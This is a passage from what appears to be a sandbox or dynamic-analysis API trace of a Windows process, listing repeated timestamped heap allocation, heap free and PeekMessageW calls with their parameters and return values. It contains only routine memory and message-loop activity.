hHeap=0xbc0000) returned 1 [0257.568] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.568] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.568] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.568] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.568] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.568] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.568] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.569] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.569] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.569] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.569] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.570] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.570] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d90 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.570] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.570] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.570] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.571] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019a8 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019b8 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.571] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.571] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.572] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.572] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9e08 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.572] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.573] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.574] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 